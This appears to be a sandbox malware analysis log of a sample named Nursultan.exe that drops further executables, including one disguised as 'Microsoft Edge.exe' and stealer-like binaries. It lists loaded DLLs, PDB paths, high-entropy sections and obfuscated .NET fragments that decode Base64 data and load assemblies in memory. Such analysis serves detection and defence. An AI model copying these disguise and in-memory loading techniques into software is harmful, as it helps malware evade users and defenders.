                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe  Section loaded: cryptsp.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe  Section loaded: rsaenh.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe  Section loaded: cryptbase.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe  Section loaded: windows.storage.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe  Section loaded: wldp.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe  Section loaded: propsys.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe  Section loaded: profapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe  Section loaded: edputil.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe  Section loaded: urlmon.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe  Section loaded: iertutil.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe  Section loaded: srvcli.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe  Section loaded: netutils.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe  Section loaded: windows.staterepositoryps.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe  Section loaded: sspicli.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe  Section loaded: wintypes.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe  Section loaded: appresolver.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe  Section loaded: bcp47langs.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe  Section loaded: slc.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe  Section loaded: userenv.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe  Section loaded: sppc.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe  Section loaded: onecorecommonproxystub.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe  Section loaded: onecoreuapcommonproxystub.dll
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe  Section loaded: mscoree.dll
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeSection loaded: version.dll
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeSection loaded: sspicli.dll
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeSection loaded: cryptsp.dll
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeSection loaded: rsaenh.dll
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeSection loaded: cryptbase.dll
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeSection loaded: mscoree.dll
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeSection loaded: version.dll
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: mscoree.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: version.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: cryptsp.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: rsaenh.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: cryptbase.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: windows.storage.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: wldp.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: propsys.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: profapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: edputil.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: urlmon.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: iertutil.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: srvcli.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: netutils.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: windows.staterepositoryps.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: sspicli.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: wintypes.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: appresolver.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: bcp47langs.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: slc.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: userenv.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: sppc.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: onecorecommonproxystub.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: onecoreuapcommonproxystub.dll
                            Source: C:\Windows\System32\cmd.exeSection loaded: winbrand.dll
                            Source: C:\Windows\System32\cmd.exeSection loaded: wldp.dll
                            Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                            Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                            Source: C:\Windows\System32\timeout.exeSection loaded: version.dll
                            Source: C:\Windows\System32\mode.comSection loaded: ulib.dll
                            Source: C:\Windows\System32\mode.comSection loaded: ureg.dll
                            Source: C:\Windows\System32\mode.comSection loaded: fsutilext.dll
                            Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeSection loaded: mscoree.dll
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeSection loaded: version.dll
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeSection loaded: windows.storage.dll
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeSection loaded: wldp.dll
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeSection loaded: profapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeSection loaded: cryptsp.dll
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeSection loaded: rsaenh.dll
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeSection loaded: cryptbase.dll
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeSection loaded: mscoree.dll
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeSection loaded: version.dll
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\Nursultan.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: Microsoft Edge.lnk.3.dr | LNK file: ..\..\..\..\..\Microsoft Edge
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\Nursultan.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: Nursultan.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: Nursultan.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: mscorlib.pdb source: Insidious.exe, 0000000B.00000002.2166607567.0000024512696000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: Insidious.exe, 0000000B.00000002.2166607567.0000024512751000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Users\maksi\Desktop\44CALIBER-main\44CALIBER\obj\Release\Insidious.pdb source: Insidious.exe, 0000000B.00000002.2166607567.00000245126B4000.00000004.00000800.00020000.00000000.sdmp, Insidious.exe, 0000000B.00000000.2093948951.0000024510882000.00000002.00000001.01000000.00000009.sdmp, Insidious.exe.4.dr
Source: Binary string: .Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: Insidious.exe, 0000000B.00000002.2157271503.0000024510BA1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdb source: Insidious.exe, 0000000B.00000002.2166607567.0000024512751000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: ws\mscorlib.pdbpdblib.pdb source: Insidious.exe, 0000000B.00000002.2157271503.0000024510BA1000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Source: Microsoft Edge.exe.0.dr, oaBdkauKNCaML.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{QjjNjusK66JsSbH7DqWLTcMT5eoaIlqlSu7OSPll79v3YPaTkhCmGOfXfhPXkx5Tjl0WPkq.QX1otp43pCr270RBikE2tHyt3ltMxIr3hglxbsP1bc7tbef8hypl9zzK3qlD8YXBQDzDGLZ,QjjNjusK66JsSbH7DqWLTcMT5eoaIlqlSu7OSPll79v3YPaTkhCmGOfXfhPXkx5Tjl0WPkq.u4PcIibrlkezPdTxO1vwIM5GeUss0ADNtfrjmYxeYLap5rrJw4HzjQg013jrwmw040aK5JU,QjjNjusK66JsSbH7DqWLTcMT5eoaIlqlSu7OSPll79v3YPaTkhCmGOfXfhPXkx5Tjl0WPkq.U38QlaH5fPyjvxgXkicJPhgPZd6lOtTNrTguDzJai9UUEiLYuqGuSdsjs7l7OCOeRiNeXQm,QjjNjusK66JsSbH7DqWLTcMT5eoaIlqlSu7OSPll79v3YPaTkhCmGOfXfhPXkx5Tjl0WPkq.TcrG86Tpz593KCYJ4Jy9eDMgmsV2VIBsSD3HsK0FbLcXF30oYmC668gJCIrbyThCT7rRKKV,_8IQtID4yHRI2I._4vI9eIQ2Jbf0sfLGtbp63cbGwyCSRTLzpmOGrjmSAkTs9CgKXxXb05X5xlLatTYUyMBg6wNF2dV1uYHRfYyQIc51E()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: Microsoft Edge.exe.0.dr, oaBdkauKNCaML.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Di7oyl5G2A3kt[2],_8IQtID4yHRI2I.esoPb8YWZwzLh8I4kDgGdErQcOG3uGHm7j80aNjYwQoYtwmn3KoxsWxNQi4ydkguhStx7RXGz6sQe0st74Vz1cG8U(Convert.FromBase64String(Di7oyl5G2A3kt[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.Nursultan.exe.128b3a60.1.raw.unpack, oaBdkauKNCaML.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{QjjNjusK66JsSbH7DqWLTcMT5eoaIlqlSu7OSPll79v3YPaTkhCmGOfXfhPXkx5Tjl0WPkq.QX1otp43pCr270RBikE2tHyt3ltMxIr3hglxbsP1bc7tbef8hypl9zzK3qlD8YXBQDzDGLZ,QjjNjusK66JsSbH7DqWLTcMT5eoaIlqlSu7OSPll79v3YPaTkhCmGOfXfhPXkx5Tjl0WPkq.u4PcIibrlkezPdTxO1vwIM5GeUss0ADNtfrjmYxeYLap5rrJw4HzjQg013jrwmw040aK5JU,QjjNjusK66JsSbH7DqWLTcMT5eoaIlqlSu7OSPll79v3YPaTkhCmGOfXfhPXkx5Tjl0WPkq.U38QlaH5fPyjvxgXkicJPhgPZd6lOtTNrTguDzJai9UUEiLYuqGuSdsjs7l7OCOeRiNeXQm,QjjNjusK66JsSbH7DqWLTcMT5eoaIlqlSu7OSPll79v3YPaTkhCmGOfXfhPXkx5Tjl0WPkq.TcrG86Tpz593KCYJ4Jy9eDMgmsV2VIBsSD3HsK0FbLcXF30oYmC668gJCIrbyThCT7rRKKV,_8IQtID4yHRI2I._4vI9eIQ2Jbf0sfLGtbp63cbGwyCSRTLzpmOGrjmSAkTs9CgKXxXb05X5xlLatTYUyMBg6wNF2dV1uYHRfYyQIc51E()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.Nursultan.exe.128b3a60.1.raw.unpack, oaBdkauKNCaML.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Di7oyl5G2A3kt[2],_8IQtID4yHRI2I.esoPb8YWZwzLh8I4kDgGdErQcOG3uGHm7j80aNjYwQoYtwmn3KoxsWxNQi4ydkguhStx7RXGz6sQe0st74Vz1cG8U(Convert.FromBase64String(Di7oyl5G2A3kt[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: Microsoft Edge.3.dr, oaBdkauKNCaML.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{QjjNjusK66JsSbH7DqWLTcMT5eoaIlqlSu7OSPll79v3YPaTkhCmGOfXfhPXkx5Tjl0WPkq.QX1otp43pCr270RBikE2tHyt3ltMxIr3hglxbsP1bc7tbef8hypl9zzK3qlD8YXBQDzDGLZ,QjjNjusK66JsSbH7DqWLTcMT5eoaIlqlSu7OSPll79v3YPaTkhCmGOfXfhPXkx5Tjl0WPkq.u4PcIibrlkezPdTxO1vwIM5GeUss0ADNtfrjmYxeYLap5rrJw4HzjQg013jrwmw040aK5JU,QjjNjusK66JsSbH7DqWLTcMT5eoaIlqlSu7OSPll79v3YPaTkhCmGOfXfhPXkx5Tjl0WPkq.U38QlaH5fPyjvxgXkicJPhgPZd6lOtTNrTguDzJai9UUEiLYuqGuSdsjs7l7OCOeRiNeXQm,QjjNjusK66JsSbH7DqWLTcMT5eoaIlqlSu7OSPll79v3YPaTkhCmGOfXfhPXkx5Tjl0WPkq.TcrG86Tpz593KCYJ4Jy9eDMgmsV2VIBsSD3HsK0FbLcXF30oYmC668gJCIrbyThCT7rRKKV,_8IQtID4yHRI2I._4vI9eIQ2Jbf0sfLGtbp63cbGwyCSRTLzpmOGrjmSAkTs9CgKXxXb05X5xlLatTYUyMBg6wNF2dV1uYHRfYyQIc51E()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: Microsoft Edge.3.dr, oaBdkauKNCaML.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Di7oyl5G2A3kt[2],_8IQtID4yHRI2I.esoPb8YWZwzLh8I4kDgGdErQcOG3uGHm7j80aNjYwQoYtwmn3KoxsWxNQi4ydkguhStx7RXGz6sQe0st74Vz1cG8U(Convert.FromBase64String(Di7oyl5G2A3kt[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 3.2.Microsoft Edge.exe.12ef1a78.0.raw.unpack, oaBdkauKNCaML.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{QjjNjusK66JsSbH7DqWLTcMT5eoaIlqlSu7OSPll79v3YPaTkhCmGOfXfhPXkx5Tjl0WPkq.QX1otp43pCr270RBikE2tHyt3ltMxIr3hglxbsP1bc7tbef8hypl9zzK3qlD8YXBQDzDGLZ,QjjNjusK66JsSbH7DqWLTcMT5eoaIlqlSu7OSPll79v3YPaTkhCmGOfXfhPXkx5Tjl0WPkq.u4PcIibrlkezPdTxO1vwIM5GeUss0ADNtfrjmYxeYLap5rrJw4HzjQg013jrwmw040aK5JU,QjjNjusK66JsSbH7DqWLTcMT5eoaIlqlSu7OSPll79v3YPaTkhCmGOfXfhPXkx5Tjl0WPkq.U38QlaH5fPyjvxgXkicJPhgPZd6lOtTNrTguDzJai9UUEiLYuqGuSdsjs7l7OCOeRiNeXQm,QjjNjusK66JsSbH7DqWLTcMT5eoaIlqlSu7OSPll79v3YPaTkhCmGOfXfhPXkx5Tjl0WPkq.TcrG86Tpz593KCYJ4Jy9eDMgmsV2VIBsSD3HsK0FbLcXF30oYmC668gJCIrbyThCT7rRKKV,_8IQtID4yHRI2I._4vI9eIQ2Jbf0sfLGtbp63cbGwyCSRTLzpmOGrjmSAkTs9CgKXxXb05X5xlLatTYUyMBg6wNF2dV1uYHRfYyQIc51E()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 3.2.Microsoft Edge.exe.12ef1a78.0.raw.unpack, oaBdkauKNCaML.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Di7oyl5G2A3kt[2],_8IQtID4yHRI2I.esoPb8YWZwzLh8I4kDgGdErQcOG3uGHm7j80aNjYwQoYtwmn3KoxsWxNQi4ydkguhStx7RXGz6sQe0st74Vz1cG8U(Convert.FromBase64String(Di7oyl5G2A3kt[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: Microsoft Edge.exe.0.dr, oaBdkauKNCaML.cs | .Net Code: OJ3ab2FppO7ZZ System.AppDomain.Load(byte[])
Source: Microsoft Edge.exe.0.dr, oaBdkauKNCaML.cs | .Net Code: WWSigm2Nfo0Hj System.AppDomain.Load(byte[])
Source: Microsoft Edge.exe.0.dr, oaBdkauKNCaML.cs | .Net Code: WWSigm2Nfo0Hj
Source: 0.2.Nursultan.exe.128b3a60.1.raw.unpack, oaBdkauKNCaML.cs | .Net Code: OJ3ab2FppO7ZZ System.AppDomain.Load(byte[])
Source: 0.2.Nursultan.exe.128b3a60.1.raw.unpack, oaBdkauKNCaML.cs | .Net Code: WWSigm2Nfo0Hj System.AppDomain.Load(byte[])
Source: 0.2.Nursultan.exe.128b3a60.1.raw.unpack, oaBdkauKNCaML.cs | .Net Code: WWSigm2Nfo0Hj
Source: Microsoft Edge.3.dr, oaBdkauKNCaML.cs | .Net Code: OJ3ab2FppO7ZZ System.AppDomain.Load(byte[])
Source: Microsoft Edge.3.dr, oaBdkauKNCaML.cs | .Net Code: WWSigm2Nfo0Hj System.AppDomain.Load(byte[])
Source: Microsoft Edge.3.dr, oaBdkauKNCaML.cs | .Net Code: WWSigm2Nfo0Hj
Source: 3.2.Microsoft Edge.exe.12ef1a78.0.raw.unpack, oaBdkauKNCaML.cs | .Net Code: OJ3ab2FppO7ZZ System.AppDomain.Load(byte[])
Source: 3.2.Microsoft Edge.exe.12ef1a78.0.raw.unpack, oaBdkauKNCaML.cs | .Net Code: WWSigm2Nfo0Hj System.AppDomain.Load(byte[])
Source: 3.2.Microsoft Edge.exe.12ef1a78.0.raw.unpack, oaBdkauKNCaML.cs | .Net Code: WWSigm2Nfo0Hj
Source: Insidious.exe.4.dr | Static PE information: 0xB967FC00 [Fri Jul 27 07:28:00 2068 UTC]
Source: C:\Users\user\Desktop\Nursultan.exe | Code function: 0_2_00007FF848E600BD pushad ; iretd 0_2_00007FF848E600C1
Source: C:\Users\user\Desktop\Nursultan.exe | Code function: 0_2_00007FF848E61149 push ebx; iretd 0_2_00007FF848E6114A
Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe | Code function: 2_2_00007FF848E700BD pushad ; iretd 2_2_00007FF848E700C1
Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe | Code function: 3_2_00007FF848E595D3 pushad ; retf 3_2_00007FF848E5960B
Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe | Code function: 4_2_00007FF848E600BD pushad ; iretd 4_2_00007FF848E600C1
Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe | Code function: 5_2_00007FF848E700BD pushad ; iretd 5_2_00007FF848E700C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_00007FF848D5D2A5 pushad ; iretd 6_2_00007FF848D5D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_00007FF848E700BD pushad ; iretd 6_2_00007FF848E700C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_00007FF848F40835 pushfd ; retf 6_2_00007FF848F40837
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_00007FF848F42316 push 8B485F93h; iretd 6_2_00007FF848F4231B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_00007FF848F42185 pushfd ; retf 6_2_00007FF848F42187
Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe | Code function: 10_2_00007FF848E600BD pushad ; iretd 10_2_00007FF848E600C1
Source: C:\Users\user\AppData\Local\Temp\Insidious.exe | Code function: 11_2_00007FF848E95995 push ebx; retf 11_2_00007FF848E959DA
Source: C:\Users\user\AppData\Local\Temp\Insidious.exe | Code function: 11_2_00007FF848EA8148 push ebx; ret 11_2_00007FF848EA816A
Source: C:\Users\user\AppData\Local\Temp\Insidious.exe | Code function: 11_2_00007FF848EA812B push ebx; ret 11_2_00007FF848EA816A
Source: C:\Users\user\AppData\Local\Temp\Insidious.exe | Code function: 11_2_00007FF848E9021D push E95D8C98h; ret 11_2_00007FF848E90259
Source: C:\Users\user\AppData\Local\Temp\Insidious.exe | Code function: 11_2_00007FF848E93DE8 push ebx; retf 11_2_00007FF848E959DA
Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe | Code function: 12_2_00007FF848E700BD pushad ; iretd 12_2_00007FF848E700C1
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Code function: 14_2_00007FF848E8BF9D pushad ; retf 14_2_00007FF848E8BFAB
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Code function: 14_2_00007FF848E8BF48 push eax; retf 14_2_00007FF848E8BF8B
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Code function: 14_2_00007FF848E700BD pushad ; iretd 14_2_00007FF848E700C1
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Code function: 14_2_00007FF849045CE2 push ecx; retn 5F30h 14_2_00007FF8490462DC
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Code function: 14_2_00007FF849045159 pushad ; ret 14_2_00007FF849045169
Source: C:\Users\user\AppData\Local\Temp\Insidious.exe | Code function: 23_2_00007FF848E912FD push esp; retn 4810h 23_2_00007FF848E916C6
Source: C:\Users\user\AppData\Local\Temp\Insidious.exe | Code function: 23_2_00007FF848E9021D push E95D8C98h; ret 23_2_00007FF848E90259
Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe | Code function: 25_2_00007FF848E900BD pushad ; iretd 25_2_00007FF848E900C1
Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe | Code function: 26_2_00007FF848E600BD pushad ; iretd 26_2_00007FF848E600C1
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Code function: 27_2_00007FF848E700BD pushad ; iretd 27_2_00007FF848E700C1
Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe | Code function: 28_2_00007FF848E810F1 push ebx; iretd 28_2_00007FF848E8114A
Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe | Code function: 28_2_00007FF848E800BD pushad ; iretd 28_2_00007FF848E800C1
Source: C:\Users\user\AppData\Local\Temp\Insidious.exe | Code function: 38_2_00007FF848E600BD pushad ; iretd 38_2_00007FF848E600C1
Source: Nursultan.exe | Static PE information: section name: .text entropy: 7.996941736899731
Source: Nursultan.exe.0.dr | Static PE information: section name: .text entropy: 7.996896093958196
Source: Nursultan2.exe.2.dr | Static PE information: section name: .text entropy: 7.994459843214496
Source: Microsoft Edge.exe.0.dr, QjjNjusK66JsSbH7DqWLTcMT5eoaIlqlSu7OSPll79v3YPaTkhCmGOfXfhPXkx5Tjl0WPkq.cs | High entropy of concatenated method names: 'PUlZjEb3CZzlIetxQMMADHk4yL430rc9AdvUieDCYv1dGhlCNPQ1CRbt5zYjp4e', 'UexpzpKm7MbCtMPODMd20cVrxDkoZRXij8RRlK97nBRNyW3LeDCiOLj2yr6yLwh', 'w5j3Lx33dXGJ0VeRd2cMjORyjTjYaE9EF8lqXD7Ir6VB3DF4AwAyOClvIRnJRQk', 'EQatjSGIjzQbxKRmNus8zFTj2Z0rkFO0vTbSUEGfLLUsCTsLUyH7cXqzEwUIUFB'
Source: Microsoft Edge.exe.0.dr, nZGo444ch7k6IvI2gABemVJZ7C7p0ns.cs | High entropy of concatenated method names: 'XVKezGs0XfryoEJC91WCQDjiwGcpCxE', 'ynHJHmD24cSRMl75asdd5cjliIL49jz', 'g4MgQeWvN20XOZUr1DJ9e5Uxw9beAal', 'EMmCKHhJAo11k37RyfPvI8G8GMzvs7aGt29aAGpkQ', 'Aw5PFkO0GtrTpsMRoSEB84uDjtcTmoDngkxSBpNBt', 'jwNgLdNd9xwoSfHTIM2R246gPGLfsEy1zOS3IJLmx', 'baQuwlZmpxg8Crooahesej86ChAWs2lSsfKp8ZNNU', 'a6adlCXmXYVK07yzd6iAr2ju1o9kD55W70cSknohV', 'CpOrF121Kgh1Dm0bvY4tEszrCihwKoHeAwpIiNfWp', 'CoOniJHTxjDTTUkU270vkmlgviZmHZE1SYeHgGLUl'
Source: Microsoft Edge.exe.0.dr, 0vVj3nVvwrfXad36q7pufUCnYEJIFff4CxYvIQw.cs | High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'e0X4q26yWyAVTs5Ky8WxAOHbLSnGpwZxz2MsxNw6I723meC995WwNgSloLJaypH', 'I22vfTC3LN3Alzg6Lbq2PrrflD3PQpBuZvwDTaQ1OsmGCVt2YR6UtxsCT55vD1p', 'eCkrd1vkp3nvQVrjpxnnryyewPNJeXHJVFdIm8xql0xS1YqYNgWvPAhnn8TFA9v', 'O3QbuFU26GVLvaKJt18dwAXKU49dM9AuOmyMpCJ6kL5cgnt67J7Hc0aPE7KRLWw'
Source: Microsoft Edge.exe.0.dr, VxN1OfJ8oh9LomMsFLxBz90MySwAzdARgi9Puzepbn2iatVIrdWM4DkMC3wV8na6IyGxLRp.cs | High entropy of concatenated method names: 'VjGrrBN7FVxOJkynYai5vk5XfOiOfeVfEYZDuMqQ2PVYCBtNR0ooUg3HJycFnS1lo6pcv6J', 'FCeFTASiTAAsk90kV2XyKloVOhroucr72aCkfrrhWGVReurmDcS3i9mKYhsyl2OsuVQizTC', 'tNj7OZrGWuRhnbhj2pIfF5enJavUCNK15lXOnGgmBBboZOxXn5EFqqSjmAC1UhwPY884mJi', 'pgnKbMmkAtLEjFCWj3PcnJmbGD3BCBbUfPIkckWRemlFWbRwgFmbWQTvePmh3UeYcsXS3J5', 'eppLFjjNmBxsvZJq5liupoKV2Nr4iIg3AX7dU5FVzKWBmS3HIU3xLe9b9JytTT3RgRq7cVD', 'ojxpJGyvT8V1uSiYUHGBpnQjOl93HO8GQN3181FFswxIhjOchvUUrT2Wrn3smdaWuKdRLS8', 'gxR4M54uf5qMllhzOOzEg9M70ukxkTRiIuKG43Ut1qM2WBFBfA8vkJJifD5fhLqauEKYFoT', 'bMdtcYyQxXZNNUd4gu0CR3qzeuuORwqAOm9oYhNaTB9bEHMOOKhLCnnRtHM7QzW65c3kP5b', '_605U5Zvlchrf1gyFhfmden1JOu6GveCYV8y8efhZG8hHrUrpgVp9oPBc2VJH2KOsQKhcsZm', 'hZAAyUzPTKKeR'
Source: Microsoft Edge.exe.0.dr, jHz7doq0Y7v0T.cs | High entropy of concatenated method names: 'Sdqcbie0XL6fG', 'Leyz2Sb6pH9GX', 'q6xbM92DX6ZTO', 'GPyz3brKuyese', 'DLpLsbvZgXodz', 'dDHiJqsXrt5nP', 'p48KSRdVAVvdn', 'VJgv36TcdusOQ', 'TnScV4pWuEwaQ', 'aAXlR0XH2nH2E'
